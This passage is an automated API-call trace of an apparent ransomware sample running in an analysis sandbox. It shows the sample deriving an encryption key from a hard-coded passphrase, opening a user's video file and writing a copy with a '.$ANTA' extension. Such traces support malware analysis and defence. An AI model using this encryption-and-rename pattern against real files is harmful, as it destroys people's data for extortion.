Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0099.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0099.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0099.036] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0099.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0099.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0099.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca508, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0099.037] CryptHashData (hHash=0x41ac600, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0099.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.037] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0099.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0099.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca760, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0099.037] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac280) returned 1 [0099.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0099.037] CryptDestroyHash (hHash=0x41ac600) returned 1 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0099.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0099.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0099.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0099.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0099.040] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0099.040] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0099.040] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0099.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0099.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0099.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0099.040] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\gOxwTO2-sZ.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\goxwto2-sz.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0099.041] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.041] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0099.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0099.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0099.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0099.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0099.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0099.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0099.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0099.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.041] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0099.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0099.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0099.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0099.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0099.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0099.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0099.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0099.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0099.042] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0099.042] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0099.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0099.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0099.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0099.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0099.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0099.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0099.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0099.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0099.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0099.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0099.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0099.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0099.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a41d8 [0099.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d18 [0099.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0099.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a138 [0099.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a41d8 | out: hHeap=0x1780000) returned 1 [0099.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0099.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0099.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0099.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0099.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d18 | out: hHeap=0x1780000) returned 1 [0099.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0099.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0099.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0099.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0099.044] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc")) returned 0x10 [0099.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0099.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a138 | out: hHeap=0x1780000) returned 1 [0099.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0099.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0099.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0099.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0099.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0099.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0099.044] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\gOxwTO2-sZ.mp4.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\goxwto2-sz.mp4.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0099.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0099.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0099.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0099.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0099.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0099.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0099.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0099.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0099.045] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0099.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0099.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0099.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0099.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0099.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0099.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0099.046] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0099.046] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0099.046] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0099.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0099.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0099.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0099.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0099.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0099.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0099.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0099.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0099.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0099.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0099.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0099.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0099.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0099.052] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0099.052] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0xbbf4, lpOverlapped=0x0) returned 1 [0099.053] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0099.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0099.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0099.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0099.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0099.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbbf4) returned 0x4516010 [0099.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0099.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0099.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0099.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0099.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0099.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0099.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbbf4) returned 0x4521c10 [0099.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0099.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0099.057] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0099.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0099.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0099.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0099.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0099.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbbf4) returned 0x4516010 [0099.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0099.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0099.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0099.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0099.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0099.058] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 